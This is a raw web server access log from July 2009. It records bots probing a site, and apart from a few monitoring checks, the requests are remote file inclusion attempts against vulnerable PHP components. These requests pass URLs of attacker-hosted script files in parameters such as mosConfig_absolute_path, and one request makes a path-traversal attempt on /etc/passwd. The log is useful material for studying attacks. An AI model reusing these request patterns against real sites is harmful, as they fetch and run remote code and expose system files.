212.193.229.157 - - [18/Jul/2009:04:10:07 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
212.193.229.157 - - [18/Jul/2009:04:10:08 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:04:10:18 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
206.41.121.69 - - [18/Jul/2009:04:10:19 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
218.237.66.229 - - [18/Jul/2009:04:10:21 -0400] "GET /logs/access_log.Q109063000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
206.41.121.69 - - [18/Jul/2009:04:10:28 -0400] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
218.146.231.194 - - [18/Jul/2009:04:10:48 -0400] "GET /?_zb_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:10:48 -0400] "GET /logs/?_zb_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 200 9994 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:10:48 -0400] "GET /logs/access_log.Q109051300/?_zb_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.146.231.194 - - [18/Jul/2009:04:10:51 -0400] "GET /logs/access_log.Q109051400/?_zb_path=http://aiplaw.com/bbs//fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.193.229.157 - - [18/Jul/2009:04:11:09 -0400] "GET /logs/access_log.Q109052800/?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
216.117.172.131 - - [18/Jul/2009:04:11:29 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:11:42 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:11:42 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:04:11:42 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:11:42 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.120.227.242 - - [18/Jul/2009:04:12:07 -0400] "GET /?_zb_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
114.200.199.144 - - [18/Jul/2009:04:12:34 -0400] "GET /logs/access_log.Q109062300/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:12:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.237.66.229 - - [18/Jul/2009:04:12:40 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:12:40 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:12:40 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:12:47 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:12:49 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:12:49 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:13:00 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:13:00 -0400] "GET /logs/access_log.Q109051800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:13:00 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:13:06 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:13:06 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:13:06 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:13:44 -0400] "GET /logs/access_log.Q109051300//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:13:54 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:13:54 -0400] "GET /config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:13:54 -0400] "GET /logs/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:00 -0400] "GET /logs/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:00 -0400] "GET /logs/access_log.Q109053000%20%20/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:01 -0400] "GET /config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:01 -0400] "GET /logs/access_log.Q109070300%20%20/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:04:14:06 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
151.1.153.1 - - [18/Jul/2009:04:14:06 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
151.1.153.1 - - [18/Jul/2009:04:14:07 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
74.223.143.131 - - [18/Jul/2009:04:14:07 -0400] "GET /logs/access_log.Q109070300%20%20/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:14:15 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:14:30 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:14:31 -0400] "GET /logs/access_log.Q109062300%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:14:38 -0400] "GET /logs/access_log.Q109062700/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:14:40 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:14:46 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:14:47 -0400] "GET /principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:14:47 -0400] "GET /logs/access_log.Q109062300%20%20/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:04:14:47 -0400] "GET /logs/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:14:56 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:59 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:14:59 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:15:10 -0400] "GET /logs/access_log.Q109053000/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:15:10 -0400] "GET /logs/access_log.Q109070300/config.php?path_to_root=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.1.153.1 - - [18/Jul/2009:04:15:13 -0400] "GET /logs/error_log.Q109061400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
114.200.199.144 - - [18/Jul/2009:04:15:28 -0400] "GET /logs/access_log.Q109052700/components/com_forum/download.php?phpbb_root_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:15:38 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
221.143.51.115 - - [18/Jul/2009:04:16:03 -0400] "GET /logs/access_log.Q109070300//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:04:16:04 -0400] "GET //vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
221.143.51.115 - - [18/Jul/2009:04:16:05 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
204.30.3.225 - - [18/Jul/2009:04:16:36 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:16:36 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:16:36 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:04:16:45 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:16:48 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:16:48 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:16:55 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.195.69.64 - - [18/Jul/2009:04:17:00 -0400] "GET /logs/access_log.Q109070200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
204.30.3.225 - - [18/Jul/2009:04:17:01 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:01 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:01 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
83.16.182.130 - - [18/Jul/2009:04:17:04 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:17:05 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:17:05 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:17:05 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:17:06 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:17:06 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
204.30.3.225 - - [18/Jul/2009:04:17:16 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:04:17:33 -0400] "GET /principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:04:17:33 -0400] "GET /logs/access_log.Q109062300%20%20/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:04:17:33 -0400] "GET /logs/principal.php?conteudo=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:35 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:35 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:35 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:17:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.30.3.225 - - [18/Jul/2009:04:17:44 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:44 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:46 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:46 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:47 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:17:49 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:04:18:05 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.208.21.7 - - [18/Jul/2009:04:18:08 -0400] "GET /logs/access_log.Q109051400/errors.php?error=http://defensive.ru/prog/lib/ID.txt??%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.208.21.7 - - [18/Jul/2009:04:18:08 -0400] "GET /errors.php?error=http://defensive.ru/prog/lib/ID.txt??%0D? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
204.30.3.225 - - [18/Jul/2009:04:18:08 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.208.21.7 - - [18/Jul/2009:04:18:09 -0400] "GET /logs/errors.php?error=http://defensive.ru/prog/lib/ID.txt??%0D? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
204.30.3.225 - - [18/Jul/2009:04:18:13 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:17 -0400] "GET /logs/access_log.Q109052200%20%20//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.16.182.130 - - [18/Jul/2009:04:18:19 -0400] "GET /logs/access_log.Q109052600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.16.182.130 - - [18/Jul/2009:04:18:19 -0400] "GET /logs/access_log.Q109052600/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
206.225.23.4 - - [18/Jul/2009:04:18:26 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:18:26 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 200 10002 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:18:26 -0400] "GET /logs/access_log.Q109062400%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:27 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:27 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:18:31 -0400] "GET /logs/access_log.Q109061200%20%20/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt????? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:41 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:41 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:04:18:41 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:04:18:41 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:18:41 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:18:42 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:18:46 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:18:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:04:18:47 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
204.30.3.225 - - [18/Jul/2009:04:18:55 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
70.86.9.234 - - [18/Jul/2009:04:19:01 -0400] "GET /logs/access_log.Q109070800/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
204.30.3.225 - - [18/Jul/2009:04:19:02 -0400] "GET /logs/access_log.Q109070800//include/admin.lib.inc.php?site_path=http://www.namak.go.kr//bbs/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
